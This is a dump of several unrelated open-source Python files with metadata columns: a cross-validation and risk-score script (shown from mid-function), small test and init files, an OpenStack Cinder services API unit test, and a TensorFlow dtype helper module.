G = data.loc[:, group_label]
if (cv_type == 'stratifiedgroupkfold'):
gkf = StratifiedGroupKFold(cvfolds, random_state=seed, shuffle=True)
elif (cv_type == 'groupkfold'):
X, Y, G = sk_u.shuffle(X,Y,G, random_state=seed)
gkf = sk_ms.GroupKFold(cvfolds)
else:
raise ValueError('incompatible crossvalidation type')
predicted_probability = []
true_label = []
for train_index, test_index in gkf.split(X,Y,G):
X_train, X_test = X.iloc[train_index], X.iloc[test_index]
Y_train, Y_test = Y.iloc[train_index], Y.iloc[test_index]
G_train, G_test = G.iloc[train_index], G.iloc[test_index]
if (calibration is None):
try:
clf.fit(X_train, Y_train.values.ravel().astype(int), groups=G_train)
except TypeError:  # estimator's fit() does not accept a groups argument
clf.fit(X_train, Y_train.values.ravel().astype(int))
calibrated_clf = clf
else:
if hasattr(clf, 'best_estimator_'):
try:
clf.fit(X_train, Y_train.values.ravel().astype(int), groups=G_train)
except TypeError:  # estimator's fit() does not accept a groups argument
clf.fit(X_train, Y_train.values.ravel().astype(int))
if(calibration == 'isotonic'):
calibrated_clf = sk_cal.CalibratedClassifierCV(clf.best_estimator_, method='isotonic', cv=10)
try:
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int), groups=G_train)
except TypeError:  # fit() does not accept a groups argument
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int))
elif(calibration == 'sigmoid'):
calibrated_clf = sk_cal.CalibratedClassifierCV(clf.best_estimator_, method='sigmoid', cv=10)
try:
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int), groups=G_train)
except TypeError:  # fit() does not accept a groups argument
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int))
else:
raise ValueError('Unknown Calibration type')
else:
if(calibration == 'isotonic'):
calibrated_clf = sk_cal.CalibratedClassifierCV(clf, method='isotonic', cv=10)
try:
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int), groups=G_train)
except TypeError:  # fit() does not accept a groups argument
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int))
elif(calibration == 'sigmoid'):
calibrated_clf = sk_cal.CalibratedClassifierCV(clf, method='sigmoid', cv=10)
try:
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int), groups=G_train)
except TypeError:  # fit() does not accept a groups argument
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int))
try:
Y_prob = calibrated_clf.predict_proba(X_test)
predicted_probability.append(Y_prob[:,1])
except AttributeError:  # classifier has no predict_proba; fall back to decision_function
Y_prob = calibrated_clf.decision_function(X_test)
predicted_probability.append(Y_prob)
true_label.append(list(Y_test.values.flat))
tl_pp_dict={"true_label":true_label, "pred_prob":predicted_probability}
return tl_pp_dict
def predict_groupkfold_RS(data, label, features, group_label, cv_type, feature_oddratio, seed, cvfolds):
X = data.loc[:,:]
Y = data.loc[:,[label]].astype(bool)
G = data.loc[:, group_label]
if (cv_type == 'stratifiedgroupkfold'):
gkf = StratifiedGroupKFold(cvfolds, random_state=seed, shuffle=True)
elif (cv_type == 'groupkfold'):
X, Y, G = sk_u.shuffle(X,Y,G, random_state=seed)
gkf = sk_ms.GroupKFold(cvfolds)
else:
raise ValueError('incompatible crossvalidation type')
predicted_probability = []
true_label = []
for train_index, test_index in gkf.split(X,Y,G):
X_train, X_test = X.iloc[train_index], X.iloc[test_index]
Y_train, Y_test = Y.iloc[train_index], Y.iloc[test_index]
Y_prob = pd.Series(0, index=X_test.index)
for feat in feature_oddratio.keys():
Y_prob += feature_oddratio[feat]*X_test.loc[:,feat]
predicted_probability.append(list(Y_prob.values.flat))
true_label.append(list(Y_test.values.flat))
tl_pp_dict={"true_label":true_label, "pred_prob":predicted_probability}
return tl_pp_dict
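# 'Refitted' risk-score variants: rather than using the supplied odds ratios directly,
# an unpenalized logistic regression is refit on each training fold over the same
# features, and its coefficients are used to score the test fold.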
def predict_kfold_refitted_RS(data, label, features, cv_type, feature_oddratio, seed, cvfolds):
X = data.loc[:, :]
Y = data.loc[:,[label]].astype(bool)
if(cv_type == 'stratifiedkfold'):
skf = sk_ms.StratifiedKFold(cvfolds, random_state=seed, shuffle=True)
elif(cv_type == 'kfold'):
skf = sk_ms.KFold(cvfolds, random_state=seed, shuffle=True)
else:
raise ValueError('incompatible crossvalidation type')
predicted_probability = []
true_label = []
lr = sk_lm.LogisticRegression(penalty='none', solver='saga')
for train_index, test_index in skf.split(X,Y):
X_train, X_test = X.iloc[train_index], X.iloc[test_index]
Y_train, Y_test = Y.iloc[train_index], Y.iloc[test_index]
X_train = X_train.loc[:,list(feature_oddratio.keys())]
lr.fit(X_train, Y_train.values.ravel().astype(int))
Y_prob = pd.Series(0, index=X_test.index)
n_feat=0
for feat in feature_oddratio.keys():
Y_prob += lr.coef_[0,n_feat]*X_test.loc[:,feat]
n_feat+=1
predicted_probability.append(list(Y_prob.values.flat))
true_label.append(list(Y_test.values.flat))
tl_pp_dict={"true_label":true_label, "pred_prob":predicted_probability}
return tl_pp_dict
def predict_groupkfold_refitted_RS(data, label, features, group_label, cv_type, feature_oddratio, seed, cvfolds):
X = data.loc[:,:]
Y = data.loc[:,[label]].astype(bool)
G = data.loc[:, group_label]
if (cv_type == 'stratifiedgroupkfold'):
gkf = StratifiedGroupKFold(cvfolds, random_state=seed, shuffle=True)
elif (cv_type == 'groupkfold'):
X, Y, G = sk_u.shuffle(X,Y,G, random_state=seed)
gkf = sk_ms.GroupKFold(cvfolds)
else:
raise ValueError('incompatible crossvalidation type')
predicted_probability = []
true_label = []
lr = sk_lm.LogisticRegression(penalty='none', solver='saga')
for train_index, test_index in gkf.split(X,Y,G):
X_train, X_test = X.iloc[train_index], X.iloc[test_index]
Y_train, Y_test = Y.iloc[train_index], Y.iloc[test_index]
X_train = X_train.loc[:,list(feature_oddratio.keys())]
lr.fit(X_train, Y_train.values.ravel().astype(int))
Y_prob = pd.Series(0, index=X_test.index)
n_feat=0
for feat in feature_oddratio.keys():
Y_prob += lr.coef_[0,n_feat]*X_test.loc[:,feat]
n_feat+=1
predicted_probability.append(list(Y_prob.values.flat))
true_label.append(list(Y_test.values.flat))
tl_pp_dict={"true_label":true_label, "pred_prob":predicted_probability}
return tl_pp_dict
def refitted_oddratios(data, label, feature_oddratio):
X = data.loc[:, list(feature_oddratio.keys())]
Y = data.loc[:,[label]].astype(bool)
lr = sk_lm.LogisticRegression(penalty='none', solver='saga')
lr.fit(X, Y.values.ravel().astype(int))
refitted_or = {}
n_feat=0
for feat in feature_oddratio.keys():
refitted_or[feat] = lr.coef_[0,n_feat]
n_feat+=1
return refitted_or
[per-file quality-signal columns omitted]
--- tests/test_sdk_version_hash.py (graphcore/examples-utils, MIT) ---
# Copyright (c) 2022 Graphcore Ltd. All rights reserved.
from examples_utils.sdk_version_hash import sdk_version_hash
def test_sdk_version():
assert isinstance(sdk_version_hash(), str)
[per-file quality-signal columns omitted]
--- src/feature_extractor/impl/__init__.py (William9923/IF4072-SentimentClassification, MIT) ---
from src.feature_extractor.impl.vectorspace import CountFeatureExtractor, TFIDFFeatureExtractor
from src.feature_extractor.impl.wordembedding import FastTextFeatureExtractor, BERTFeatureExtractor, RobertaFeatureExtractor
[per-file quality-signal columns omitted]
--- cinder/tests/unit/api/contrib/test_services.py (ISCAS-VDI/cinder-base, Apache-2.0) ---
# Copyright 2012 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
from iso8601 import iso8601
from oslo_utils import timeutils
import webob.exc
from cinder.api.contrib import services
from cinder.api import extensions
from cinder import context
from cinder import db
from cinder import exception
from cinder import policy
from cinder import test
from cinder.tests.unit.api import fakes
from cinder.tests.unit import fake_constants as fake
fake_services_list = [
{'binary': 'cinder-scheduler',
'host': 'host1',
'availability_zone': 'cinder',
'id': 1,
'disabled': True,
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 2),
'created_at': datetime.datetime(2012, 9, 18, 2, 46, 27),
'disabled_reason': 'test1',
'modified_at': ''},
{'binary': 'cinder-volume',
'host': 'host1',
'availability_zone': 'cinder',
'id': 2,
'disabled': True,
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 5),
'created_at': datetime.datetime(2012, 9, 18, 2, 46, 27),
'disabled_reason': 'test2',
'modified_at': ''},
{'binary': 'cinder-scheduler',
'host': 'host2',
'availability_zone': 'cinder',
'id': 3,
'disabled': False,
'updated_at': datetime.datetime(2012, 9, 19, 6, 55, 34),
'created_at': datetime.datetime(2012, 9, 18, 2, 46, 28),
'disabled_reason': '',
'modified_at': ''},
{'binary': 'cinder-volume',
'host': 'host2',
'availability_zone': 'cinder',
'id': 4,
'disabled': True,
'updated_at': datetime.datetime(2012, 9, 18, 8, 3, 38),
'created_at': datetime.datetime(2012, 9, 18, 2, 46, 28),
'disabled_reason': 'test4',
'modified_at': ''},
{'binary': 'cinder-volume',
'host': 'host2',
'availability_zone': 'cinder',
'id': 5,
'disabled': True,
'updated_at': datetime.datetime(2012, 9, 18, 8, 3, 38),
'created_at': datetime.datetime(2012, 9, 18, 2, 46, 28),
'disabled_reason': 'test5',
'modified_at': datetime.datetime(2012, 10, 29, 13, 42, 5)},
{'binary': 'cinder-volume',
'host': 'host2',
'availability_zone': 'cinder',
'id': 6,
'disabled': False,
'updated_at': datetime.datetime(2012, 9, 18, 8, 3, 38),
'created_at': datetime.datetime(2012, 9, 18, 2, 46, 28),
'disabled_reason': '',
'modified_at': datetime.datetime(2012, 9, 18, 8, 1, 38)},
{'binary': 'cinder-scheduler',
'host': 'host2',
'availability_zone': 'cinder',
'id': 6,
'disabled': False,
'updated_at': None,
'created_at': datetime.datetime(2012, 9, 18, 2, 46, 28),
'disabled_reason': '',
'modified_at': None},
]
class FakeRequest(object):
environ = {"cinder.context": context.get_admin_context()}
GET = {}
# NOTE(uni): deprecating service request key, binary takes precedence
# Still keeping service key here for API compatibility sake.
class FakeRequestWithService(object):
environ = {"cinder.context": context.get_admin_context()}
GET = {"service": "cinder-volume"}
class FakeRequestWithBinary(object):
environ = {"cinder.context": context.get_admin_context()}
GET = {"binary": "cinder-volume"}
class FakeRequestWithHost(object):
environ = {"cinder.context": context.get_admin_context()}
GET = {"host": "host1"}
# NOTE(uni): deprecating service request key, binary takes precedence
# Still keeping service key here for API compatibility sake.
class FakeRequestWithHostService(object):
environ = {"cinder.context": context.get_admin_context()}
GET = {"host": "host1", "service": "cinder-volume"}
class FakeRequestWithHostBinary(object):
environ = {"cinder.context": context.get_admin_context()}
GET = {"host": "host1", "binary": "cinder-volume"}
def fake_service_get_all(context, filters=None):
filters = filters or {}
host = filters.get('host')
binary = filters.get('binary')
return [s for s in fake_services_list
if (not host or s['host'] == host or
s['host'].startswith(host + '@'))
and (not binary or s['binary'] == binary)]
def fake_service_get_by_host_binary(context, host, binary):
for service in fake_services_list:
if service['host'] == host and service['binary'] == binary:
return service
return None
def fake_service_get_by_id(value):
for service in fake_services_list:
if service['id'] == value:
return service
return None
def fake_service_update(context, service_id, values):
service = fake_service_get_by_id(service_id)
if service is None:
raise exception.ServiceNotFound(service_id=service_id)
else:
return {'host': 'host1', 'service': 'cinder-volume',
'disabled': values['disabled']}
def fake_policy_enforce(context, action, target):
pass
def fake_utcnow(with_timezone=False):
tzinfo = iso8601.Utc() if with_timezone else None
return datetime.datetime(2012, 10, 29, 13, 42, 11, tzinfo=tzinfo)
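# fake_utcnow pins 'now' to 2012-10-29 13:42:11 so that each service's up/down state,
# derived from its updated_at timestamp, is deterministic.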
class ServicesTest(test.TestCase):
def setUp(self):
super(ServicesTest, self).setUp()
self.stubs.Set(db, "service_get_all", fake_service_get_all)
self.stubs.Set(timeutils, "utcnow", fake_utcnow)
self.stubs.Set(db, "service_get_by_args",
fake_service_get_by_host_binary)
self.stubs.Set(db, "service_update", fake_service_update)
self.stubs.Set(policy, "enforce", fake_policy_enforce)
self.context = context.get_admin_context()
self.ext_mgr = extensions.ExtensionManager()
self.ext_mgr.extensions = {}
self.controller = services.ServiceController(self.ext_mgr)
def test_services_list(self):
req = FakeRequest()
res_dict = self.controller.index(req)
response = {'services': [{'binary': 'cinder-scheduler',
'host': 'host1', 'zone': 'cinder',
'status': 'disabled', 'state': 'up',
'updated_at': datetime.datetime(
2012, 10, 29, 13, 42, 2)},
{'binary': 'cinder-volume',
'host': 'host1', 'zone': 'cinder',
'status': 'disabled', 'state': 'up',
'updated_at': datetime.datetime(
2012, 10, 29, 13, 42, 5)},
{'binary': 'cinder-scheduler',
'host': 'host2',
'zone': 'cinder',
'status': 'enabled', 'state': 'down',
'updated_at': datetime.datetime(
2012, 9, 19, 6, 55, 34)},
{'binary': 'cinder-volume',
'host': 'host2',
'zone': 'cinder',
'status': 'disabled', 'state': 'down',
'updated_at': datetime.datetime(
2012, 9, 18, 8, 3, 38)},
{'binary': 'cinder-volume',
'host': 'host2',
'zone': 'cinder',
'status': 'disabled', 'state': 'down',
'updated_at': datetime.datetime(
2012, 10, 29, 13, 42, 5)},
{'binary': 'cinder-volume',
'host': 'host2',
'zone': 'cinder',
'status': 'enabled', 'state': 'down',
'updated_at': datetime.datetime(
2012, 9, 18, 8, 3, 38)},
{'binary': 'cinder-scheduler',
'host': 'host2',
'zone': 'cinder',
'status': 'enabled', 'state': 'down',
'updated_at': None},
]}
self.assertEqual(response, res_dict)
def test_services_detail(self):
self.ext_mgr.extensions['os-extended-services'] = True
self.controller = services.ServiceController(self.ext_mgr)
req = FakeRequest()
res_dict = self.controller.index(req)
response = {'services': [{'binary': 'cinder-scheduler',
'host': 'host1', 'zone': 'cinder',
'status': 'disabled', 'state': 'up',
'updated_at': datetime.datetime(
2012, 10, 29, 13, 42, 2),
'disabled_reason': 'test1'},
{'binary': 'cinder-volume',
'replication_status': None,
'active_backend_id': None,
'frozen': False,
'host': 'host1', 'zone': 'cinder',
'status': 'disabled', 'state': 'up',
'updated_at': datetime.datetime(
2012, 10, 29, 13, 42, 5),
'disabled_reason': 'test2'},
{'binary': 'cinder-scheduler',
'host': 'host2',
'zone': 'cinder',
'status': 'enabled', 'state': 'down',
'updated_at': datetime.datetime(
2012, 9, 19, 6, 55, 34),
'disabled_reason': ''},
{'binary': 'cinder-volume',
'replication_status': None,
'active_backend_id': None,
'frozen': False,
'host': 'host2',
'zone': 'cinder',
'status': 'disabled', 'state': 'down',
'updated_at': datetime.datetime(
2012, 9, 18, 8, 3, 38),
'disabled_reason': 'test4'},
{'binary': 'cinder-volume',
'replication_status': None,
'active_backend_id': None,
'frozen': False,
'host': 'host2',
'zone': 'cinder',
'status': 'disabled', 'state': 'down',
'updated_at': datetime.datetime(
2012, 10, 29, 13, 42, 5),
'disabled_reason': 'test5'},
{'binary': 'cinder-volume',
'replication_status': None,
'active_backend_id': None,
'frozen': False,
'host': 'host2',
'zone': 'cinder',
'status': 'enabled', 'state': 'down',
'updated_at': datetime.datetime(
2012, 9, 18, 8, 3, 38),
'disabled_reason': ''},
{'binary': 'cinder-scheduler',
'host': 'host2',
'zone': 'cinder',
'status': 'enabled', 'state': 'down',
'updated_at': None,
'disabled_reason': ''},
]}
self.assertEqual(response, res_dict)
def test_services_list_with_host(self):
req = FakeRequestWithHost()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'cinder-scheduler',
'host': 'host1',
'zone': 'cinder',
'status': 'disabled', 'state': 'up',
'updated_at': datetime.datetime(2012, 10,
29, 13, 42, 2)},
{'binary': 'cinder-volume',
'host': 'host1',
'zone': 'cinder',
'status': 'disabled', 'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29,
13, 42, 5)}]}
self.assertEqual(response, res_dict)
def test_services_detail_with_host(self):
self.ext_mgr.extensions['os-extended-services'] = True
self.controller = services.ServiceController(self.ext_mgr)
req = FakeRequestWithHost()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'cinder-scheduler',
'host': 'host1',
'zone': 'cinder',
'status': 'disabled', 'state': 'up',
'updated_at': datetime.datetime(2012, 10,
29, 13, 42, 2),
'disabled_reason': 'test1'},
{'binary': 'cinder-volume',
'frozen': False,
'replication_status': None,
'active_backend_id': None,
'host': 'host1',
'zone': 'cinder',
'status': 'disabled', 'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29,
13, 42, 5),
'disabled_reason': 'test2'}]}
self.assertEqual(response, res_dict)
def test_services_list_with_service(self):
req = FakeRequestWithService()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'cinder-volume',
'host': 'host1',
'zone': 'cinder',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29,
13, 42, 5)},
{'binary': 'cinder-volume',
'host': 'host2',
'zone': 'cinder',
'status': 'disabled',
'state': 'down',
'updated_at': datetime.datetime(2012, 9, 18,
8, 3, 38)},
{'binary': 'cinder-volume',
'host': 'host2',
'zone': 'cinder',
'status': 'disabled',
'state': 'down',
'updated_at': datetime.datetime(2012, 10, 29,
13, 42, 5)},
{'binary': 'cinder-volume',
'host': 'host2',
'zone': 'cinder',
'status': 'enabled',
'state': 'down',
'updated_at': datetime.datetime(2012, 9, 18,
8, 3, 38)}]}
self.assertEqual(response, res_dict)
def test_services_detail_with_service(self):
self.ext_mgr.extensions['os-extended-services'] = True
self.controller = services.ServiceController(self.ext_mgr)
req = FakeRequestWithService()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'cinder-volume',
'replication_status': None,
'active_backend_id': None,
'frozen': False,
'host': 'host1',
'zone': 'cinder',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29,
13, 42, 5),
'disabled_reason': 'test2'},
{'binary': 'cinder-volume',
'replication_status': None,
'active_backend_id': None,
'frozen': False,
'host': 'host2',
'zone': 'cinder',
'status': 'disabled',
'state': 'down',
'updated_at': datetime.datetime(2012, 9, 18,
8, 3, 38),
'disabled_reason': 'test4'},
{'binary': 'cinder-volume',
'replication_status': None,
'active_backend_id': None,
'frozen': False,
'host': 'host2',
'zone': 'cinder',
'status': 'disabled',
'state': 'down',
'updated_at': datetime.datetime(2012, 10, 29,
13, 42, 5),
'disabled_reason': 'test5'},
{'binary': 'cinder-volume',
'replication_status': None,
'active_backend_id': None,
'frozen': False,
'host': 'host2',
'zone': 'cinder',
'status': 'enabled',
'state': 'down',
'updated_at': datetime.datetime(2012, 9, 18,
8, 3, 38),
'disabled_reason': ''}]}
self.assertEqual(response, res_dict)
def test_services_list_with_binary(self):
req = FakeRequestWithBinary()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'cinder-volume',
'host': 'host1',
'zone': 'cinder',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29,
13, 42, 5)},
{'binary': 'cinder-volume',
'host': 'host2',
'zone': 'cinder',
'status': 'disabled',
'state': 'down',
'updated_at': datetime.datetime(2012, 9, 18,
8, 3, 38)},
{'binary': 'cinder-volume',
'host': 'host2',
'zone': 'cinder',
'status': 'disabled',
'state': 'down',
'updated_at': datetime.datetime(2012, 10, 29,
13, 42, 5)},
{'binary': 'cinder-volume',
'host': 'host2',
'zone': 'cinder',
'status': 'enabled',
'state': 'down',
'updated_at': datetime.datetime(2012, 9, 18,
8, 3, 38)}]}
self.assertEqual(response, res_dict)
def test_services_detail_with_binary(self):
self.ext_mgr.extensions['os-extended-services'] = True
self.controller = services.ServiceController(self.ext_mgr)
req = FakeRequestWithBinary()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'cinder-volume',
'replication_status': None,
'active_backend_id': None,
'host': 'host1',
'zone': 'cinder',
'status': 'disabled',
'state': 'up',
'frozen': False,
'updated_at': datetime.datetime(2012, 10, 29,
13, 42, 5),
'disabled_reason': 'test2'},
{'binary': 'cinder-volume',
'replication_status': None,
'active_backend_id': None,
'host': 'host2',
'zone': 'cinder',
'status': 'disabled',
'state': 'down',
'frozen': False,
'updated_at': datetime.datetime(2012, 9, 18,
8, 3, 38),
'disabled_reason': 'test4'},
{'binary': 'cinder-volume',
'replication_status': None,
'active_backend_id': None,
'host': 'host2',
'zone': 'cinder',
'status': 'disabled',
'state': 'down',
'frozen': False,
'updated_at': datetime.datetime(2012, 10, 29,
13, 42, 5),
'disabled_reason': 'test5'},
{'binary': 'cinder-volume',
'replication_status': None,
'active_backend_id': None,
'host': 'host2',
'zone': 'cinder',
'status': 'enabled',
'state': 'down',
'frozen': False,
'updated_at': datetime.datetime(2012, 9, 18,
8, 3, 38),
'disabled_reason': ''}]}
self.assertEqual(response, res_dict)
def test_services_list_with_host_service(self):
req = FakeRequestWithHostService()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'cinder-volume',
'host': 'host1',
'zone': 'cinder',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29,
13, 42, 5)}]}
self.assertEqual(response, res_dict)
def test_services_detail_with_host_service(self):
self.ext_mgr.extensions['os-extended-services'] = True
self.controller = services.ServiceController(self.ext_mgr)
req = FakeRequestWithHostService()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'cinder-volume',
'replication_status': None,
'active_backend_id': None,
'host': 'host1',
'zone': 'cinder',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29,
13, 42, 5),
'disabled_reason': 'test2',
'frozen': False}]}
self.assertEqual(response, res_dict)
def test_services_list_with_host_binary(self):
req = FakeRequestWithHostBinary()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'cinder-volume',
'host': 'host1',
'zone': 'cinder',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29,
13, 42, 5)}]}
self.assertEqual(response, res_dict)
def test_services_detail_with_host_binary(self):
self.ext_mgr.extensions['os-extended-services'] = True
self.controller = services.ServiceController(self.ext_mgr)
req = FakeRequestWithHostBinary()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'cinder-volume',
'replication_status': None,
'active_backend_id': None,
'frozen': False,
'host': 'host1',
'zone': 'cinder',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29,
13, 42, 5),
'disabled_reason': 'test2'}]}
self.assertEqual(response, res_dict)
def test_services_enable_with_service_key(self):
body = {'host': 'host1', 'service': 'cinder-volume'}
req = fakes.HTTPRequest.blank(
'/v2/%s/os-services/enable' % fake.PROJECT_ID)
res_dict = self.controller.update(req, "enable", body)
self.assertEqual('enabled', res_dict['status'])
def test_services_enable_with_binary_key(self):
body = {'host': 'host1', 'binary': 'cinder-volume'}
req = fakes.HTTPRequest.blank(
'/v2/%s/os-services/enable' % fake.PROJECT_ID)
res_dict = self.controller.update(req, "enable", body)
self.assertEqual('enabled', res_dict['status'])
def test_services_disable_with_service_key(self):
req = fakes.HTTPRequest.blank(
'/v2/%s/os-services/disable' % fake.PROJECT_ID)
body = {'host': 'host1', 'service': 'cinder-volume'}
res_dict = self.controller.update(req, "disable", body)
self.assertEqual('disabled', res_dict['status'])
def test_services_disable_with_binary_key(self):
req = fakes.HTTPRequest.blank(
'/v2/%s/os-services/disable' % fake.PROJECT_ID)
body = {'host': 'host1', 'binary': 'cinder-volume'}
res_dict = self.controller.update(req, "disable", body)
self.assertEqual('disabled', res_dict['status'])
def test_services_disable_log_reason(self):
self.ext_mgr.extensions['os-extended-services'] = True
self.controller = services.ServiceController(self.ext_mgr)
req = (
fakes.HTTPRequest.blank('v1/fake/os-services/disable-log-reason'))
body = {'host': 'host1',
'binary': 'cinder-scheduler',
'disabled_reason': 'test-reason',
}
res_dict = self.controller.update(req, "disable-log-reason", body)
self.assertEqual('disabled', res_dict['status'])
self.assertEqual('test-reason', res_dict['disabled_reason'])
def test_services_disable_log_reason_none(self):
self.ext_mgr.extensions['os-extended-services'] = True
self.controller = services.ServiceController(self.ext_mgr)
req = (
fakes.HTTPRequest.blank('v1/fake/os-services/disable-log-reason'))
body = {'host': 'host1',
'binary': 'cinder-scheduler',
'disabled_reason': None,
}
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update,
req, "disable-log-reason", body)
def test_invalid_reason_field(self):
        # Check that whitespace-only strings are not allowed
reason = ' ' * 10
self.assertFalse(self.controller._is_valid_as_reason(reason))
reason = 'a' * 256
self.assertFalse(self.controller._is_valid_as_reason(reason))
# Check that spaces at the end are also counted
reason = 'a' * 255 + ' '
self.assertFalse(self.controller._is_valid_as_reason(reason))
reason = 'it\'s a valid reason.'
self.assertTrue(self.controller._is_valid_as_reason(reason))
reason = None
self.assertFalse(self.controller._is_valid_as_reason(reason))
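# A minimal sketch (an assumption, not the controller's actual code) of the
# validation rules that test_invalid_reason_field exercises above: a reason
# must be non-empty after stripping, and trailing spaces count toward the
# 255-character limit because the length is checked before stripping.
def _is_valid_as_reason_sketch(reason):
    if not reason:                 # rejects None and the empty string
        return False
    if len(reason) > 255:          # 'a' * 255 + ' ' is 256 chars: too long
        return False
    return bool(reason.strip())    # rejects whitespace-only reasons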
| 40.636228 | 78 | 0.483036 | 2,480 | 27,145 | 5.13871 | 0.095161 | 0.065286 | 0.081607 | 0.088041 | 0.830665 | 0.812932 | 0.790333 | 0.773227 | 0.754708 | 0.724969 | 0 | 0.044706 | 0.382796 | 27,145 | 667 | 79 | 40.697151 | 0.715948 | 0.034481 | 0 | 0.793403 | 0 | 0 | 0.212846 | 0.006797 | 0 | 0 | 0 | 0 | 0.041667 | 1 | 0.045139 | false | 0.001736 | 0.022569 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
| 9c4ef3070547cafe19eb61b5f247e543a3c9e764 | 1,603 | py | Python | built-in/TensorFlow/Official/nlp/Transformer_for_TensorFlow/noahnmt/utils/constant_utils.py | Ascend/modelzoo | f018cfed33dbb1cc2110b9ea2e233333f71cc509 | ["Apache-2.0"] | 12 | 2020-12-13T08:34:24.000Z | 2022-03-20T15:17:17.000Z | built-in/TensorFlow/Official/nlp/Transformer_for_TensorFlow/noahnmt/utils/constant_utils.py | Ascend/modelzoo | f018cfed33dbb1cc2110b9ea2e233333f71cc509 | ["Apache-2.0"] | 1 | 2022-01-20T03:11:05.000Z | 2022-01-20T06:53:39.000Z | built-in/TensorFlow/Official/nlp/Transformer_for_TensorFlow/noahnmt/utils/constant_utils.py | Ascend/modelzoo | f018cfed33dbb1cc2110b9ea2e233333f71cc509 | ["Apache-2.0"] | 2 | 2021-07-10T12:40:46.000Z | 2021-12-17T07:55:15.000Z |
# coding=utf-8
# Copyright Huawei Noah's Ark Lab.
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tensorflow as tf
import numpy as np
flags = tf.flags
FLAGS = flags.FLAGS
INF = 10000.0
def DT_FLOAT():
return tf.float16 if FLAGS.use_fp16 else tf.float32
def NP_FLOAT():
return np.float16 if FLAGS.use_fp16 else np.float32
def DT_INT():
return tf.int32
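# Illustrative usage (an assumption, not part of constant_utils.py): the
# helpers are functions rather than module constants so that the dtype is
# resolved only after command-line flags have been parsed.
if __name__ == "__main__":
    flags.DEFINE_boolean("use_fp16", False, "use float16 precision")
    FLAGS(["constant_utils"])     # parse flags with no extra CLI arguments
    x = tf.zeros([2, 3], dtype=DT_FLOAT())  # tf.float32 unless --use_fp16
    a = np.zeros([2, 3], dtype=NP_FLOAT())  # the matching NumPy dtype
    print(x.dtype, a.dtype, DT_INT())       # int dtype is fixed at tf.int32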
| 32.714286 | 78 | 0.720524 | 244 | 1,603 | 4.713115 | 0.393443 | 0.104348 | 0.045217 | 0.055652 | 0.766957 | 0.766957 | 0.723478 | 0.723478 | 0.723478 | 0.723478 | 0 | 0.027653 | 0.165315 | 1,603 | 48 | 79 | 33.395833 | 0.831839 | 0.792265 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.272727 | false | 0 | 0.181818 | 0.272727 | 0.727273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 7 |
